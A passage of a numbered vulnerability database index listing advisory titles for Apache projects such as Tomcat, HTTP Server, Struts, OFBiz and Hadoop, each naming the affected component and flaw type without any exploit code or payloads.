16338| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
16339| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
16340| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
16341| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
16342| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
16343| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
16344| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
16345| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
16346| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
16347| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
16348| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
16349| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
16350| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
16351| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
16352| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
16353| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
16354| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
16355| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
16356| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
16357| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
16358| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
16359| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
16360| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
16361| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
16362| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
16363| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
16364| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
16365| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
16366| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
16367| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
16368| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
16369| [87579] Apache Tomcat DIGEST Authentication Stale Nonce Verification Authentication Bypass Weakness
16370| [87477] Apache Tomcat Project Woodstock Service Error Page UTF-7 XSS Weakness
16371| [87227] Apache Tomcat InternalNioInputBuffer.java parseHeaders() Function Request Header Size Parsing Remote DoS
16372| [87223] Apache Tomcat DIGEST Authentication replay-countermeasure Functionality cnonce / cn Verification Authentication Bypass Weakness
16373| [87160] Apache Commons HttpClient X.509 Certificate Domain Name Matching MiTM Weakness
16374| [87159] Apache CXF X.509 Certificate Domain Name Matching MiTM Weakness
16375| [87150] Apache Axis / Axis2 X.509 Certificate Domain Name Matching MiTM Weakness
16376| [86902] Apache HTTP Server 3xx Redirect Internal IP Address Remote Disclosure
16377| [86901] Apache Tomcat Error Message Path Disclosure
16378| [86684] Apache CloudStack Unauthorized Arbitrary API Call Invocation
16379| [86556] Apache Open For Business Project (OFBiz) Unspecified Issue
16380| [86503] Visual Tools VS home/apache/DiskManager/cron/init_diskmgr Local Command Execution
16381| [86401] Apache ActiveMQ ResourceHandler Traversal Arbitrary File Access
16382| [86225] Apache Axis2 XML Signature Wrapping (XSW) Authentication Bypass
16383| [86206] Apache Axis2 Crafted SAML Assertion Signature Exclusion Attack Authentication Bypass
16384| [85722] Apache CXF SOAP Request Parsing Access Restriction Bypass
16385| [85704] Apache Qpid Incoming Client Connection Saturation Remote DoS
16386| [85474] Eucalyptus Apache Santuario (XML Security for Java) Library XML Signature Transform Handling DoS
16387| [85430] Apache mod_pagespeed Module Unspecified XSS
16388| [85429] Apache mod_pagespeed Module Hostname Verification Cross-host Resource Disclosure
16389| [85249] Apache Wicket Unspecified XSS
16390| [85236] Apache Hadoop conf/hadoop-env.sh Temporary File Symlink Arbitrary File Manipulation
16391| [85090] Apache HTTP Server mod_proxy_ajp.c mod_proxy_ajp Module Proxy Functionality Cross-client Information Disclosure
16392| [85089] Apache HTTP Server mod_proxy_http.c mod_proxy_http Module Cross-client Information Disclosure
16393| [85062] Apache Solr Autocomplete Module for Drupal Autocomplete Results XSS
16394| [85010] Apache Struts Token Handling Mechanism Token Name Configuration Parameter CSRF Weakness
16395| [85009] Apache Struts Request Parameter OGNL Expression Parsing Remote DoS
16396| [84911] libapache2-mod-rpaf X-Forward-For HTTP Header Parsing Remote DoS
16397| [84823] Apache HTTP Server Multiple Module Back End Server Error Handling HTTP Request Parsing Remote Information Disclosure
16398| [84818] Apache HTTP Server mod_negotiation Module mod_negotiation.c make_variant_list Function XSS
16399| [84562] Apache Qpid Broker Authentication Mechanism AMQP Client Shadow Connection NullAuthenticator Request Parsing Authentication Bypass
16400| [84458] Apache Libcloud SSL Certificate Validation MitM Spoofing Weakness
16401| [84279] PHP on Apache php_default_post_reader POST Request Handling Overflow DoS
16402| [84278] PHP w/ Apache PDO::ATTR_DEFAULT_FETCH_MODE / PDO::FETCH_CLASS DoS
16403| [84231] Apache Hadoop DataNodes Client BlockTokens Arbitrary Block Access
16404| [83943] Oracle Solaris Cluster Apache Tomcat Agent Subcomponent Unspecified Local Privilege Escalation
16405| [83939] Oracle Solaris Apache HTTP Server Subcomponent Unspecified Remote Information Disclosure
16406| [83685] svnauthcheck Apache HTTP Configuration File Permission Revocation Weakness
16407| [83682] Apache Sling POST Servlet @CopyFrom Operation HTTP Request Parsing Infinite Loop Remote DoS
16408| [83339] Apache Roller Blogger Roll Unspecified XSS
16409| [83270] Apache Roller Unspecified Admin Action CSRF
16410| [82782] Apache CXF WS-SecurityPolicy 1.1 SupportingToken Policy Bypass
16411| [82781] Apache CXF WS-SecurityPolicy Supporting Token Children Specification Token Signing Verification Weakness
16412| [82611] cPanel Apache Piped Log Configuration Log Message Formatting Traversal Arbitrary File Creation
16413| [82436] MapServer for Windows Bundled Apache / PHP Configuration Local File Inclusion
16414| [82215] PHP sapi/cgi/cgi_main.c apache_request_headers Function HTTP Header Handling Remote Overflow
16415| [82161] Apache Commons Compress bzip2 File Compression BZip2CompressorOutputStream Class File Handling Remote DoS
16416| [81965] Apache Batik Squiggle SVG Browser JAR File Arbitrary Code Execution
16417| [81790] Apache POI src/org/apache/poi/hwpf/model/UnhandledDataStructure.java UnhandledDataStructure() constructor Length Attribute CDF / CFBF File Handling Remote DoS
16418| [81660] Apache Qpid Credential Checking Cluster Authentication Bypass
16419| [81511] Apache for Debian /usr/share/doc HTTP Request Parsing Local Script Execution
16420| [81359] Apache HTTP Server LD_LIBRARY_PATH Variable Local Privilege Escalation
16421| [81349] Apache Open For Business Project (OFBiz) Webslinger Component Unspecified XSS
16422| [81348] Apache Open For Business Project (OFBiz) Content IDs / Map-Keys Unspecified XSS
16423| [81347] Apache Open For Business Project (OFBiz) Parameter Arrays Unspecified XSS
16424| [81346] Apache Open For Business Project (OFBiz) checkoutProcess.js getServerError() Function Unspecified XSS
16425| [81196] Apache Open For Business Project (OFBiz) FlexibleStringExpander Nested Script String Parsing Remote Code Execution
16426| [80981] Apache Hadoop Kerberos/MapReduce Security Feature User Impersonation Weakness
16427| [80571] Apache Traffic Server Host HTTP Header Parsing Remote Overflow
16428| [80547] Apache Struts XSLTResult.java File Upload Arbitrary Command Execution
16429| [80360] AskApache Password Protector Plugin for WordPress Error Page $_SERVER Superglobal XSS
16430| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
16431| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
16432| [80300] Apache Wicket wicket:pageMapName Parameter XSS
16433| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
16434| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
16435| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
16436| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
16437| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
16438| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
16439| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
16440| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
16441| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
16442| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
16443| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
16444| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
16445| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
16446| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
16447| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
16448| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
16449| [78331] Apache Tomcat Request Object Recycling Information Disclosure
16450| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
16451| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
16452| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
16453| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
16454| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
16455| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
16456| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
16457| [77593] Apache Struts Conversion Error OGNL Expression Injection
16458| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
16459| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
16460| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
16461| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
16462| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
16463| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
16464| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
16465| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
16466| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
16467| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
16468| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
16469| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
16470| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
16471| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
16472| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
16473| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
16474| [74725] Apache Wicket Multi Window Support Unspecified XSS
16475| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
16476| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
16477| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
16478| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
16479| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
16480| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
16481| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
16482| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
16483| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
16484| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
16485| [73644] Apache XML Security Signature Key Parsing Overflow DoS
16486| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
16487| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
16488| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
16489| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
16490| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
16491| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
16492| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
16493| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
16494| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
16495| [73154] Apache Archiva Multiple Unspecified CSRF
16496| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
16497| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
16498| [72238] Apache Struts Action / Method Names <
16499| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
16500| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
16501| [71557] Apache Tomcat HTML Manager Multiple XSS
16502| [71075] Apache Archiva User Management Page XSS
16503| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
16504| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
16505| [70924] Apache Continuum Multiple Admin Function CSRF
16506| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
16507| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
16508| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
16509| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
16510| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
16511| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
16512| [69520] Apache Archiva Administrator Credential Manipulation CSRF
16513| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
16514| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
16515| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
16516| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
16517| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
16518| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
16519| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
16520| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
16521| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
16522| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
16523| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
16524| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
16525| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
16526| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
16527| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
16528| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
16529| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
16530| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
16531| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
16532| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
16533| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
16534| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
16535| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
16536| [65054] Apache ActiveMQ Jetty Error Handler XSS
16537| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
16538| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
16539| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
16540| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
16541| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
16542| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
16543| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
16544| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
16545| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
16546| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
16547| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
16548| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
16549| [63895] Apache HTTP Server mod_headers Unspecified Issue
16550| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
16551| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
16552| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
16553| [63140] Apache Thrift Service Malformed Data Remote DoS
16554| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
16555| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
16556| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
16557| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
16558| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
16559| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
16560| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
16561| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
16562| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
16563| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
16564| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
16565| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
16566| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
16567| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
16568| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
16569| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
16570| [60678] Apache Roller Comment Email Notification Manipulation DoS
16571| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
16572| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
16573| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
16574| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
16575| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
16576| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
16577| [60232] PHP on Apache php.exe Direct Request Remote DoS
16578| [60176] Apache Tomcat Windows Installer Admin Default Password
16579| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
16580| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
16581| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
16582| [59944] Apache Hadoop jobhistory.jsp XSS
16583| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
16584| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
16585| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
16586| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
16587| [59019] Apache mod_python Cookie Salting Weakness
16588| [59018] Apache Harmony Error Message Handling Overflow
16589| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
16590| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
16591| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
16592| [59010] Apache Solr get-file.jsp XSS
16593| [59009] Apache Solr action.jsp XSS
16594| [59008] Apache Solr analysis.jsp XSS
16595| [59007] Apache Solr schema.jsp Multiple Parameter XSS
16596| [59006] Apache Beehive select / checkbox Tag XSS
16597| [59005] Apache Beehive jpfScopeID Global Parameter XSS
16598| [59004] Apache Beehive Error Message XSS
16599| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
16600| [59002] Apache Jetspeed default-page.psml URI XSS
16601| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
16602| [59000] Apache CXF Unsigned Message Policy Bypass
16603| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
16604| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
16605| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
16606| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
16607| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
16608| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
16609| [58993] Apache Hadoop browseBlock.jsp XSS
16610| [58991] Apache Hadoop browseDirectory.jsp XSS
16611| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
16612| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
16613| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
16614| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
16615| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
16616| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
16617| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
16618| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
16619| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
16620| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
16621| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
16622| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
16623| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
16624| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
16625| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
16626| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
16627| [58974] Apache Sling /apps Script User Session Management Access Weakness
16628| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
16629| [58931] Apache Geronimo Cookie Parameters Validation Weakness
16630| [58930] Apache Xalan-C++ XPath Handling Remote DoS
16631| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
16632| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
16633| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
16634| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
16635| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
16636| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
16637| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
16638| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
16639| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
16640| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
16641| [58805] Apache Derby Unauthenticated Database / Admin Access
16642| [58804] Apache Wicket Header Contribution Unspecified Issue
16643| [58803] Apache Wicket Session Fixation
16644| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
16645| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
16646| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
16647| [58799] Apache Tapestry Logging Cleartext Password Disclosure
16648| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
16649| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
16650| [58796] Apache Jetspeed Unsalted Password Storage Weakness
16651| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
16652| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
16653| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
16654| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
16655| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
16656| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
16657| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
16658| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
16659| [58775] Apache JSPWiki preview.jsp action Parameter XSS
16660| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16661| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
16662| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
16663| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
16664| [58770] Apache JSPWiki Group.jsp group Parameter XSS
16665| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
16666| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
16667| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
16668| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
16669| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
16670| [58763] Apache JSPWiki Include Tag Multiple Script XSS
16671| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
16672| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
16673| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
16674| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
16675| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
16676| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
16677| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
16678| [58755] Apache Harmony DRLVM Non-public Class Member Access
16679| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
16680| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
16681| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
16682| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
16683| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
16684| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
16685| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
16686| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
16687| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
16688| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
16689| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
16690| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
16691| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
16692| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
16693| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
16694| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
16695| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
16696| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
16697| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
16698| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
16699| [58725] Apache Tapestry Basic String ACL Bypass Weakness
16700| [58724] Apache Roller Logout Functionality Failure Session Persistence
16701| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
16702| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
16703| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
16704| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
16705| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
16706| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
